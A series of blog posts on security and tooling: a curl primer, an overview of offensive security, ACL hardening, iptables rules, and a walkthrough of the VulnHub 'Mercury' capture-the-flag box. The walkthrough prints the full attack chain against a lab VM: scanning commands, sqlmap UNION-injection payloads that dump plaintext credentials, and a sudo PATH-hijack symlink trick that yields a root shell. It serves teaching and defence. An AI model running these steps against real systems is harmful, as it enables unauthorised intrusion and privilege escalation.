General Tips

Core Tools to Know: curl

As all bloggers eventually find out, two of the best reasons to write blog posts are either to document something for yourself for later or to force yourself to learn something well enough to explain it to others. That's the impetus of this series, which I plan on doing from time to time. I want to get more familiar with some of these core tools and also have a reference/resource available that is in "Pete Think" so I can quickly find what I need to use these tools if I forget.

The first tool I want to tackle is curl. In the world of command-line tools, curl shines as a flexible utility for transferring data over various network protocols. Whether you’re working on the development side, the network admin side, or the security side, learning how to use curl effectively can be incredibly beneficial. This blog post will guide you through the very basics of curl, cover some common use cases, and explain when curl might be a better choice than wget.

What is curl?

curl (short for "Client URL") is a command-line tool for transferring data with URLs. It supports a wide range of protocols including HTTP, HTTPS, FTP, SCP, TELNET, LDAP, IMAP, SMB, and many more. curl is known for its flexibility and is widely used for interacting with APIs, downloading files, and testing network connections.

Installing curl

Before diving into curl commands, you need to ensure it is installed on your system. Lots of operating systems come with it. In fact, even Windows has shipped with curl in Windows 10 and 11.

For Linux:

sudo apt-get install curl  # Debian/Ubuntu
sudo yum install curl      # CentOS/RHEL

For macOS:

brew install curl

For Windows
You can download the installer from the official curl website if it isn't already on your system. To check, just type curl --help at the command prompt and see if it understands the command. If you get something back like this, you're all set.

C:\Users\peteonsoftware>curl --help
Usage: curl [options...] <url>
 -d, --data <data>           HTTP POST data
 -f, --fail                  Fail fast with no output on HTTP errors
 -h, --help <category>       Get help for commands
 -i, --include               Include response headers in output
 -o, --output <file>         Write to file instead of stdout
 -O, --remote-name           Write output to file named as remote file
 -s, --silent                Silent mode
 -T, --upload-file <file>    Transfer local FILE to destination
 -u, --user <user:password>  Server user and password
 -A, --user-agent <name>     Send User-Agent <name> to server
 -v, --verbose               Make the operation more talkative
 -V, --version               Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".

The Simplest Example

The simplest way to use curl is to fetch the contents of a URL. Here is a basic example that will print the HTML content of the specified URL to the terminal:

c:\
λ curl https://hosthtml.live
<!doctype html>
<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_M6heeSY2n3p1IRsqfcIljkNrgqYXDBDFSWeybupIpyihjfHMZhFu8kniDL51hLxUnYHjgmcv2EYUtXfRDcRWZQ==" lang="en" style="background: #2B2B2B;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC">
    <link rel="preconnect" href="https://www.google.com" crossorigin>
</head>
<body>
<div id="target" style="opacity: 0"></div>
<script>window.park = "eyJ1dWlkIjoiZDFhODUxY2ItOTUyZi00NGUyLTg4ZWMtMmU3ZGNhZmE1OTk0IiwicGFnZV90aW1lIjoxNzIwNzMyMzQxLCJwYWdlX3VybCI6Imh0dHBzOi8vaG9zdGh0bWwubGl2ZS8iLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6e30sImhvc3QiOiJob3N0aHRtbC5saXZlIiwiaXAiOiI3Mi4xMDQuMTY5LjE1NCJ9Cg==";</script>
<script src="/bwjblpHBR.js"></script>
</body>
</html>

Some Useful Examples to Actually Do Stuff

Downloading Files

# To download a file and save it with a specific name:
curl -o curlypigtail.jpg https://peteonsoftware.com/images/202407/curlytail.jpg

# If you want to save the file with the same name as in the URL:
curl -O https://peteonsoftware.com/images/202407/curlytail.jpg
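
# As a bonus: if a large download gets interrupted, curl can pick up where
# it left off. A quick sketch, reusing the same image URL; -C - tells curl
# to figure out the resume offset automatically:
curl -C - -O https://peteonsoftware.com/images/202407/curlytail.jpg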

Sending HTTP Requests

# GET requests are used to retrieve data from a server. The basic example is already shown above. 
# To include headers in the output, use the -i option:
curl -i https://hosthtml.live

# POST requests are used to send data to a server. 
# This is particularly useful when interacting with APIs. 
curl -X POST -d "param1=value1&param2=value2" http://somereallygreat.net/api

# Many APIs now accept JSON.  This is how you'd send that
curl -X POST -H "Content-Type: application/json" -d '{"key1":"value1", "key2":"value2"}' http://somereallygreat.net/api

# Without explaining it, we included a header above (-H).  That added a Content-Type header.  
# To add an Auth header, you might do something like this
curl -H "Authorization: Bearer token" http://asitethatneedsbearertokens.com

Cookies

# To save cookies from a response
curl -c cookies.txt https://www.google.com

# To send cookies with a request
curl -b cookies.txt https://www.google.com

When to Use curl Over wget

While both curl and wget are used to transfer data over the internet, they have different strengths. Daniel Stenberg, the creator of curl (and an occasional wget contributor), has published a lengthier comparison here. I defer to the expert, but here are some of my big takeaways.

curl Advantages

  • Flexibility: curl supports a wider range of protocols (like SCP, SFTP) and provides more options for customizing requests.
  • Availability: curl comes preinstalled on macOS and Windows 10/11. wget doesn’t.
  • Chaining: curl can chain multiple requests together in a single invocation, making it powerful for scripting complex interactions (see the sketch after this list).
  • Reuse: curl is backed by a library (libcurl) that you can embed in your own programs, while wget is just a command-line tool.
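
To show what I mean by chaining, here is a minimal sketch using curl's --next separator, which starts a fresh operation (with its own options) for the following URL. The example.com URLs, parameters, and cookie flow are made up for illustration:

# Log in (saving cookies), then fetch a second page with those cookies,
# all in one curl invocation
curl -s -c cookies.txt -d "user=pete&pass=secret" https://example.com/login \
  --next -s -b cookies.txt https://example.com/account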

wget Advantages

  • Recursive Downloads: wget can download entire websites recursively, making it ideal for mirroring sites.
  • Simplicity: For simple downloading tasks, wget might be more straightforward and easier to use.

curl is a versatile tool that – once mastered – can simplify many network-related tasks. From downloading files to interacting with APIs, curl provides the flexibility and functionality needed for a wide range of applications. While wget has its strengths, particularly for simple downloads and recursive website copying, curl shines in its versatility and extensive options for customizing requests.

InfoSec

Understanding Offensive Security

At first blush, Offensive Security can seem like an oxymoron or a misnomer. Are we saying that the best defense is a good offense? Not really. When people say that in the traditional sense, they usually mean that by attacking, you don't give your opponent a chance to attack you, and therefore there is less for you to defend against. That's not what we're doing here. We are not out attacking the "bad guys" in an attempt to tie up their resources and keep them from attacking us. What we're really talking about is attacking ourselves, either internally or through a third-party vendor.

Offensive security refers to proactive measures taken to identify, assess, and mitigate vulnerabilities within a system before malicious hackers can exploit them. Unlike defensive security, which focuses on protection and prevention, offensive security involves simulating attacks to uncover weaknesses and bolster defenses. This approach is also known as ethical hacking or penetration testing.

The hacking is "ethical" because the people performing the exercise have permission to do it, share all of their results with the target, and don't keep, use, or share any vulnerabilities or data they might uncover with the outside world. Penetration testing (pen testing) is a process that involves simulating cyberattacks to identify vulnerabilities in a system, network, or application. Ethical hackers use the same techniques as malicious actors to find and fix security flaws.

Taking this up a notch is something called Red Teaming. Red teaming is an advanced form of penetration testing where a group of security professionals, known as the red team, emulates real-world cyberattacks over an extended period. Their goal is to test the organization's detection and response capabilities. These groups perform vulnerability assessments, which involve systematically examining systems for vulnerabilities, typically using automated tools. While less thorough than penetration testing, vulnerability assessments provide a broad overview of potential security issues. In addition, offensive security professionals will often use social engineering attacks to exploit human psychology rather than technical vulnerabilities, and they often conduct phishing simulations and other exercises to test an organization's security awareness.

So that explains a little of what these teams do, but let’s consider a little more of the why.

  • Proactive Defense: Offensive security allows organizations to identify and address vulnerabilities before they can be exploited by attackers. By staying one step ahead, companies can significantly reduce the risk of data breaches and other security incidents.
  • Improving Security Posture: Regular penetration testing and vulnerability assessments provide actionable insights that help organizations strengthen their security posture. This ongoing process ensures that defenses evolve in response to emerging threats.
  • Compliance and Regulatory Requirements: Many industries have strict compliance and regulatory standards that mandate regular security testing. Offensive security practices help organizations meet these requirements and avoid potential fines and penalties. I can tell you that in several recent audits and compliance engagements, the assessors wanted evidence that we regularly conduct offensive security operations against our company.
  • Incident Response Preparedness: Red teaming exercises and other offensive security activities help organizations test and refine their incident response plans. This ensures that in the event of a real attack, the organization is prepared to respond quickly and effectively.

Ethical Hackers (or White Hat Hackers) are the backbone of offensive security. We're talking about individuals who have the skillset to "be the bad guys" (Black Hat Hackers), but instead earn a living helping others be prepared. The important thing, though, is that you don't have to be born a hacker, spend time in the seedy underbelly of the internet, or wear all black to go into this field. There is a lot of reputable training available, and there are some respected certifications (CEH and OSCP, to name two) that can help your employment chances in the field.

If you're interested, give it a shot. There is almost no barrier to entry. Sites like TryHackMe and HackTheBox have free tiers, and there are tons of YouTube channels offering training, walkthroughs, and advice. I plan on spending a fair amount of time in future posts talking about various security topics – often from the Offensive Security angle – and working through some of the problems available on places like TryHackMe, HackTheBox, and VulnHub. That way, I can give back a little and add one more resource to the pile in gratitude for what has been given to me, so stay tuned for that.

InfoSec

Locking Down Mercury

In my last post, I did a walkthrough for the VulnHub box The Planets: Mercury. This box was conceived and implemented to be low-hanging fruit for people who enjoy Capture the Flag (CTF) exercises. The remediation advice for much of what we used to gain our initial foothold is pretty basic, and it should be familiar to anyone who takes security hygiene seriously, and certainly to anyone running a production web server. Additionally, Injection (SQL and otherwise) appears on the OWASP Top 10 consistently. It should be checked and remediated early, but often isn't. Nevertheless, we weren't splitting atoms to find it or to suggest how to fix it. Here are the basic "Don'ts" from the Mercury CTF:

  • Don’t leave default error pages in place
  • Don’t leave public “to do” lists
  • Don’t construct SQL Queries using blind concatenation
  • Don’t leave text files with passwords in plain text (or any encoding) on the server

But none of those are how we gained root on the box. We took advantage of a misconfiguration on the server that was intended to let the user read from a log file. The Mercury box wanted to allow the user to read records from the /var/log/syslog file. Normally, that file requires elevated permissions to read it. The Admins on this example box chose to create a script that reads the last 10 lines from the file and then gave the user permissions to run sudo on this script. Unfortunately, we were able to use symlinks to cause that script to allow us to ultimately open a root shell instead.

But what could the Admins have done differently? The best solution here is probably using Access Control Lists (ACLs). Linux file systems have supported these by default for a few generations now. To work with them, we can just install a package and then configure the permissions.

Take a look at these simple commands that could have prevented this avenue of privesc on Mercury.

# Install the acl package
# In Debian-based systems
sudo apt-get install acl
# In RedHat-based systems
sudo yum install acl

# See if your file system supports ACLs
grep acl /etc/mke2fs.conf

# If they do, you will see acl in the default mount options
default_mntopts = acl,user_xattr

# If not, you should be able to run this command to set it up
# This has not been tested by me, as every Linux box I could find already had the permissions
sudo mount -o remount,acl /

# Looking at the ACL on the file to start, we see that the owning user (syslog)
# has read and write, the adm group has read, and everyone else has no permissions.
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
group::r--
other::---

# Now I'm going to configure a user to have read permissions using
# setfacl which was added when we installed the acl package
sudo setfacl -m u:exampleuser:r /var/log/syslog

# Let's check again
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
user:exampleuser:r--
group::r--
mask::r--
other::---

# You'll notice that now we have another user row in the output, saying
# that exampleuser has read permissions on the file
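
# Side note: if you ever need to revoke that access later, setfacl can
# remove the entry just as easily (same exampleuser as above; note that
# -x takes no permission bits)
sudo setfacl -x u:exampleuser /var/log/syslog

# Or strip every extended ACL entry from the file in one shot
sudo setfacl -b /var/log/syslog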

That's it! It took me less than two minutes in total, and this avenue of escalation could have been prevented. This is a good example of how thinking like an attacker can help you be a better Administrator: consider how every change you make to a system could be exploited, and then think about a better way. When in doubt, look for guidance; don't get "creative".

Capture the Flag

VulnHub Walkthrough – The Planets: Mercury

In this post, I want to take you through a walkthrough of how to hack your way into an intentionally vulnerable VM provided by VulnHub and created by user SirFlash. You can see more about this exercise and download your own copy of the .ova file to follow along here. I've found that the easiest way to run this VM is with VirtualBox, but you do have to do some specific setup/configuration for the machine to work like we want it to. Because we can't get into the machine, we can't really configure very much, so the VirtualBox settings are key.

In addition to VirtualBox, you need a machine to do the penetration test from. Kali Linux is very popular, though I have worked through several of these kinds of exercises with Linux Mint. Kali isn’t meant to be a “daily driver” OS and is just a version of Linux with a lot of tools preinstalled. You can install your favorite tools yourself on any distro that you’d like, or even use another preconfigured one (like Parrot, Black Arch, etc). Many tools are also available on Windows, especially if you have Windows Subsystem for Linux installed and configured. However, if you are ever working through tutorials, walkthroughs, books, videos, or forums, Linux is almost always assumed. There are a lot of resources to get started with Linux and it isn’t nearly as daunting as you’d think.

Just as a note, this machine is in a category called “Capture the Flag” (CTF). This is a fun style of game where you can practice certain skills, techniques, and problem solving abilities. It, however, isn’t necessarily indicative of “real world” penetration tests. My goal is to talk through my thought process as we walk through so you can see how I’m using some of the techniques I’ve learned to operate within the guidelines that CTFs often have. Feel free to just read this through as information, but it is also very fun and beneficial if you can follow along.

I’m starting from the assumption that you’ve already installed VirtualBox, downloaded the Mercury.ova file, and have a machine to attack from.

Getting Started

After you download the Mercury.ova file, open VirtualBox. Click the File menu, and then select Import Appliance
VirtualBox File Import Appliance

Next, you will be prompted to locate the file to import. Make sure your source is “Local File System” and then use the file selector to navigate to where you downloaded the .ova file.
VirtualBox File Import Step Two

Then, you’ll be shown a summary of settings. I was fine with what was here and I clicked Finish.
VirtualBox File Import Step Three

It will do its thing and when it is done, you will see the Mercury VM show up in your list of VMs on the left hand side.
VirtualBox Mercury Fully Imported

Next, with the virtual machine selected, you’ll want to click the orange Settings Gear (1), then select the Network menu (2), choose Host-only Adapter from the Attached to: drop down (3), and click OK (4). This will close the dialog box. Then click the green Start button (5) to start the VM. It is possible that you may not have a Host-only Adapter properly configured. If not – and because these details have changed in the past – just work through this Google Search. We’re doing this as a good way to allow VM to VM communication and that’s all.
Setting the VirtualBox Host Only Adapter

Once you’ve hit the play button, the machine will start up and you’ll see some Linux OS information go by and then the box will finally get to a login prompt. This means you’re ready to go. You can now minimize that window and get ready to work.
Mercury VM Login Prompt

For my environment, I have another VirtualBox VM running Kali, whose network adapter I changed from its normal NAT setting to Host-only for this exercise. I booted that up and logged in. The first thing we need to do is make sure we have netdiscover on our box. Kali is Debian-based, so it uses apt to install things by default. I opened a terminal and issued the command sudo apt install netdiscover. I had already entered my sudo password before this, so I wasn't prompted, but you might be. I also already had this on my box, so your command window may look different during and after the install.
apt install netdiscover

Then, I ran an ifconfig to see what my available network interfaces were. You can see that I have two network interfaces. One is called eth0 and the other is lo. lo is my local loopback interface, so eth0 is the one I want. Yours may be called something different for many reasons, including how you configured your adapters within VirtualBox.
ifconfig results

Next, I ran the command sudo netdiscover -i eth0. That brought up an auto-updating table that scanned every possible network address connected through that interface (-i eth0). Our goal here is to find out what IP Address the Mercury VM is at. If you aren’t sure, you can scan each one, but in this case, I know it is the one located at 192.168.56.101.
Netdiscover Results

That means that it is now time to scan the box. This is our first "this is a CTF, not real life" warning. All of the scans I'm doing here are "noisy". What that means is that I'm not sneaking around. I'm running these so they take less time from my perspective and are as intrusive as possible. If I were really doing a penetration test on someone, their monitoring tools would light up. It would be like a criminal pulling up to your house in a loud truck blaring music and wearing jingle bells as they used a battering ram on your front door.

Warning aside, I ran nmap -sC -sV -p- -T4 --min-rate=9326 -vv -oN mercury_nmap.log 192.168.56.101. That command breaks down as: use default scripts (-sC), try to detect versions (-sV), scan all 65535 ports (-p-), go super fast (-T4, where 5 is the highest/fastest), send at least 9326 packets per second (--min-rate=9326), make the output very verbose (-vv), write the output to a file called mercury_nmap.log (-oN mercury_nmap.log), and lastly scan 192.168.56.101. Why 9326 packets per second? No real reason that I'm aware of, except that someone I was learning from used it once, so I do.
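
If you want to copy and paste it, here is that same scan with a comment per option:

# Default scripts (-sC), version detection (-sV), all 65535 ports (-p-),
# aggressive timing (-T4), a minimum packet rate, very verbose output,
# and results logged to mercury_nmap.log
nmap -sC -sV -p- -T4 --min-rate=9326 -vv -oN mercury_nmap.log 192.168.56.101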

That scan returned a lot of results, but the main things we learned from it are:

Nmap scan report for 192.168.56.101
Host is up, received conn-refused (0.00054s latency).
Scanned at 2024-03-22 16:11:14 EDT for 96s
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2

So this machine exposes a web server and has secure shell (SSH) open. My next step is also now built on CTF mentality. I’m assuming that SSH is mid-game in our chess match. I figure I’m supposed to learn something from the web server first that will make the SSH part a little easier. So, I navigated to http://192.168.56.101:8080 and got this.
Mercury's Default Webpage

Sometimes, in CTFs, the developers will leave clues in the Source. In this case, that text is all there is. It isn’t even HTML. So my next step was to use a tool to enumerate the website to try to find directories that aren’t linked to by just “guessing” from curated wordlists and seeing what hits. In this case, I used the command gobuster dir -w /usr/share/wordlists/dirb/common.txt -o mercury_gobuster.log -u http://192.168.56.101:8080. This just used the gobuster program in directory mode (dir) with the wordlist (-w) of common possibilities, outputting (-o) to a log file against the url (-u) of our website. One of the benefits to using a box made for Offensive Security is that they often come with wordlists like this, though you can find them online, download them, and use them wherever you’re working from.
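
Again, here is the copy/paste-friendly version (the wordlist path assumes Kali's preinstalled lists):

# Directory mode, common wordlist, output to a log, against our target URL
gobuster dir -w /usr/share/wordlists/dirb/common.txt \
  -o mercury_gobuster.log -u http://192.168.56.101:8080
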
My gobuster results

Well, the only thing we found is a robots.txt. Because we didn’t find anything else, I did try some larger and larger lists, but they also returned only the robots.txt. I guess that means we should check it out.
Robots.txt Contents

Wow. That's almost amazing in its uselessness. Now, we are at another point where I took a shot. I know a few things: 1) this box is marked as "Easy" and 2) this is a CTF. Some CTFs (especially harder ones) might have an open port with a trail for you to follow and even more work than this, all for it to lead to nothing but a waste of time. But because this is Easy, I wanted to see if causing an error would give us information. Maybe the error page would give us server OS info and we could try an exploit, or reveal something else entirely. So, I navigated to http://192.168.56.101:8080/showmea404 in an attempt to see the 404 page.
The Mercury 404 Page

Jackpot. This server is using Django (useful), but even more useful is that it tried to resolve my URL by checking the index (we know about that), the robots.txt (ditto), and in a directory called mercuryfacts. Hmmmmm, that sounds promising. Let’s navigate to http://192.168.56.101:8080/mercuryfacts
The Mercury Facts Home Page

Here we go! We can load a fact and we can see their Todo List. (The Todo List is the sort of thing that is often left in HTML comments in these). So, I checked the Todo link first and found this
Mercury Facts Todo

Okay, information! We know there is either a users table that already exists or they are using some (probably poor) other means of authentication in the interim. Also, they are making direct mysql calls (I'm smelling some possible SQL Injection!). What about that other link? I clicked it and it took me to fact 1. I went back and clicked it again and again; the fact isn't random. These are all plain GET requests and there is no navigation. So, I started just changing the number. First I went to 2 and got another fact, then to 999 and got no fact. Lastly, I tried a fact id of "pete" and that got me an error page (see how we love error pages that leak information!?)
Mercury Facts Enumeration

What we see in that error is that they are taking the value from the URL and sticking it directly into a SQL query. Because we sent a word and not a number, MySQL thought I was trying to address a column in the WHERE clause. I don't need to go any further; I'm going to jump right into sqlmap to try to exploit this. sqlmap is a tool that attempts SQL injection several different ways. When it works, you can dump databases, get table data, and all kinds of good stuff.

The first thing I tested was whether or not this would actually work. So, I issued the command sqlmap -u "http://192.168.56.101:8080/mercuryfacts/1" --dbms=mysql --risk=3 --level=5 --technique=U. In this case, the -u is our URL, and --dbms tells it which database product to try to hit. We know it's MySQL from the todos, but sqlmap can also guess if you don't provide that. The --risk and --level values are just about the noise we're willing to make and how hard we want the tool to try. Lastly, --technique=U tells it to use UNION-based injection in an attempt to exfiltrate the data.
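
Here is that first sqlmap probe in copy/paste form:

# Probe the URL for UNION-based injection against MySQL, with risk and
# level turned all the way up
sqlmap -u "http://192.168.56.101:8080/mercuryfacts/1" --dbms=mysql \
  --risk=3 --level=5 --technique=U
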
sqlmap initial results

We see that this comes back and the parameter is injectable. This means we can try something else. In this case, I issued the command sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 --dbms=mysql --risk=3 --level=5 --technique=U --tables. That's very similar except that I added --tables so it would enumerate the tables. We got this

sqlmap identified the following injection point(s) with a total of 119 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: information_schema
[78 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
              -- SNIP -- 
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

Database: mercury
[2 tables]
+---------------------------------------+
| facts                                 |
| users                                 |
+---------------------------------------+

Okay, the first information_schema db is just a built-in feature of the DBMS. I --SNIP--'ed a lot of that out of there so you could see it, but let's not have it clog us up. We care about the mercury db and its two tables: facts and users. If we remember, the Todo list wanted to start using the users table, so we're very interested. Let's dump it: sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 --dbms=mysql -D mercury -T users --dump --batch --technique=U --level=5 --risk=3. Our only change this time is to remove the request to list the tables and instead specify the database name (-D mercury) and the table name (-T users), tell it to --dump the contents, and use --batch so sqlmap automatically accepts the default answer to any prompts.

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7162707a71,0x71554a4b637448434261574e63514344716a56734371626a667a586a62507555586a635a4b717549,0x7176786a71)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

Here we go! We have some usernames and plain text passwords. Now we can try to see what that SSH has got going on! Incidentally, if you examine the results of these scans, it took the tool 119 requests to dump the databases and tables and 49 requests to just get these 4 rows of one table. See what I mean about noisy?

Let's use the webmaster account to get into the box. It seems like the highest-ranking account. In addition, it has the best password, so I'm guessing it has the juicy stuff. So now we issue the command ssh webmaster@192.168.56.101 and hit enter. Enter the password and accept the fingerprint when you're asked, and we're in. The first thing I did was an ls to list the contents of the directory, and there is a user_flag.txt right there. I issued a cat user_flag.txt command and we have our user flag!
SSH into Mercury

The thing about CTF boxes is that there is often a User flag and then a Root (or Admin) flag. We're only half done. Might as well keep exploring. What's in this mercury_proj directory? To find out, I typed cd mercury_proj/ && ls and saw a notes.txt file. I called cat notes.txt and got 2 users and 2 passwords of some sort. We know the webmaster password, so if we can work out the encoding or hashing, we might have a shot. At a minimum, this looks like Base64 encoding (the == padding at the end of the linuxmaster user's password is often a giveaway, as = is used as padding in base64). But just because it is base64 doesn't mean that's the answer; encryption will often use base64 as the final step so all of the characters are printable. So, I used the echo command to echo each value and piped (|) it into the base64 utility, asking it to --decode. We see that the webmaster password is the one we know, so we can trust that this linuxmaster value is probably their password.
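
The real encoded strings are in the screenshot below, but the pattern looks like this (the value here is a made-up stand-in, not the one from the box):

# Pipe a base64 value into the decoder; this prints "somepassword"
echo "c29tZXBhc3N3b3Jk" | base64 --decode
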
Base64 Encoded Passwords

We can check that immediately by calling su linuxmaster and providing that password. It is accepted and a whoami tells me that I’m now linuxmaster. Is this over now? Is it this easy? We wish! I dug around but didn’t find any other flags, so I’ll spare you those searches.
Changing to Linuxmaster user

That means that our next step is likely privilege escalation. There are a few ways to go, but one of the easiest is to look and see what applications the user might be able to call with sudo and act as root. Issuing the command sudo -l will tell you just that.
Finding Linuxmaster sudo Permissions

Okay, so we can run a specific bash script as sudo. Oh, that's good news. Sometimes, we can edit what's in the file and just do whatever we want. Other times, we can take advantage of what's in the file and abuse the command another way. Let's see what we've got. In the image above, you can see that I followed that up with cat /usr/bin/check_syslog.sh to see what's in the file. It just calls the Linux tail program to get the last 10 lines out of the /var/log/syslog file. This is actually a common kind of misconfiguration. The /var/log/syslog file needs elevated permissions, or at least very specific permissions, to read. Instead of creating a group and giving that group permission to the file, or using access control lists (ACLs), the admin figured he could give this user (and perhaps others) sudo permission on this script that only did one simple thing. But they weren't expecting this.
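
As an aside, on Debian-family systems like this one, /var/log/syslog is typically readable by the adm group, so the boring, supported fix could have been a one-liner. A sketch, with a hypothetical user:

# Add the user to the adm group, which can already read syslog
sudo usermod -aG adm exampleuser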

Linux (like many operating systems) stores files in directory structures. The technically correct way to call every single program is to give its full path every time. We don't do that. We just want to type ls or cat, not /bin/ls and /bin/cat or /usr/bin/ls and /usr/bin/cat. That's where the PATH variable comes in. It defines a list of places/directories (in order) where the operating system will look for the thing you asked for. When using sudo, your normal PATH is supposed to be ignored in favor of the secure_path, which in this case, for this user, was declared as /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, /sbin, /bin, and /snap/bin. You can see that in the sudo -l output above.

We're going to take advantage of this because you also see that we have the env_reset permission when using sudo. That lets us CHANGE where it is willing to look for commands. So, what we're going to do is create a symlink (think shortcut, of sorts) in our current directory called tail that actually points to /bin/vi. That means whenever the current directory is in the path and someone calls tail, vi will run instead. Some of you who are familiar with vi or vim will know that it can basically run like its own little operating system. So, if I can get this bash script to run as sudo and then open vi, I can then do things within vi as root. Here are the steps:
We actually take advantage of the flaw

In this case, the first thing I do is make sure I'm in my home directory, somewhere I have full permissions, just in case (cd ~). Then I create a symlink (ln -s) pointing to /bin/vi whenever someone calls the command tail (which is called from within that script). Next, I update my own PATH variable to be my current directory plus the existing path. export PATH means I'm exporting that environment variable, the equals sign assigns whatever is on the right hand side to the variable, the . is my current directory (where I put the symlink), the : concatenates these values, and $PATH is the current PATH environment variable. So in one sentence: I updated my local PATH environment variable to include what it already had, but put my current directory in first position so it is checked for a command match first.

The next line is me making a typo; you can ignore it. I left it in to show that I'm human, too 😉 But the right version of the command says sudo --preserve-env=PATH /usr/bin/check_syslog.sh. I'm calling for the elevated permissions, but then I'm using --preserve-env (because we have the env_reset permission) to use my new PATH environment variable (which includes my local directory) instead of the one carefully defined for me in secure_path. When I hit enter, vi automatically opens.
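
Pulled out of the screenshots, the whole escalation comes down to just a few lines (reconstructed from the steps described above):

# Work from our home directory, where we have full permissions
cd ~
# Create a symlink so that "tail" actually runs vi
ln -s /bin/vi tail
# Put the current directory at the front of our PATH
export PATH=.:$PATH
# Run the script with our PATH preserved; tail resolves to vi, which opens as root
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
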
Our VI Window

If I type :, I'm automatically popped into command mode, and typing shell and hitting enter opens a shell in my current context, which, thanks to the sudo call on the check_syslog.sh file, is root. You can see here that I typed whoami and I'm told that I'm root. I issued a cd ~ && ls command to change into root's home directory and list out its contents. I see that there is a root_flag.txt file, and a quick cat root_flag.txt shows us that file's contents.
We are root and showing the root flag

That’s it. In doing this box, we used the following skills:

  • nmap scan
  • gobuster scan (directory enumeration)
  • Found Error Page misconfiguration
  • Detected and exploited SQLi (SQL Injection)
  • Luck (found additional credentials)
  • symlinks
  • Misconfigured permissions, specifically around sudo and the secure_path variable

Not bad for a day’s work! Next time, I’ll take off a Red Team hat and put on a Blue Team hat and explain how the Administrators could have better protected this file and the sudo permissions (if they used them anyway).

InfoSec

Firewalls: Rules? A Guide with Examples

Rules are meant to be broken… as long as it’s not my rules

Signs representing a lot of rules

Introduction

Previously, we've talked about what firewalls are and what types of firewalls exist. This time, as the last post in my Firewall miniseries, I want to dig into the kinds of rules that make these firewalls work.


Basic Firewall Rules and Configurations

For some of these rule examples, I'm going to include one way to declare each rule using iptables, which is available as a very simple host-based firewall on Linux systems. (The Wikipedia summary is that iptables is a user-space utility program that allows a system administrator to configure the IP packet filter rules of the Linux kernel firewall, implemented as different Netfilter modules.) I chose to present the examples this way because it is indicative of the general thought process used to create these kinds of rules, even if the syntax can vary. This isn't an iptables tutorial, and a total and proper implementation for each example might contain other commands as well.

Other examples are more complicated and aren't really suited to iptables, so for those I give some simplified examples using other products in the marketplace that meet the challenge.

IP Address-Based Rules

  • Example Rule: Deny all traffic from external IP 142.250.189.174 to any IP within the network.
  • Use Case: This rule is useful when you want to block specific external threats known by their IP addresses.
  • Simple Implementation: sudo iptables -A INPUT -s 142.250.189.174 -j DROP
  • Implementation Explanation: sudo executes the command as a super user (administrative permissions). iptables is the Linux firewall utility. -A INPUT appends (-A) this rule to the INPUT chain, which handles inbound packets. -s 142.250.189.174 means that this rule applies to packets coming from the source (-s) of 142.250.189.174. -j DROP means that a match will jump (-j) to the DROP action, so the packet will not be passed along to the rest of the system. (A quick way to verify or undo a rule like this is sketched just below.)
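
If you're following along and want to confirm the rule took effect (or remove it while testing), these companion commands may help; a sketch using standard iptables flags:

# List the INPUT chain with line numbers so you can find your rule
sudo iptables -L INPUT -n --line-numbers

# Delete the rule by restating it...
sudo iptables -D INPUT -s 142.250.189.174 -j DROP
# ...or by its line number from the listing above
sudo iptables -D INPUT 1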

Port-Based Rules

  • Example Rule: Allow TCP traffic only on port 443 (HTTPS).
  • Use Case: Ideal for web servers that should only communicate via web traffic ports.
  • Simple Implementation: sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT && sudo iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
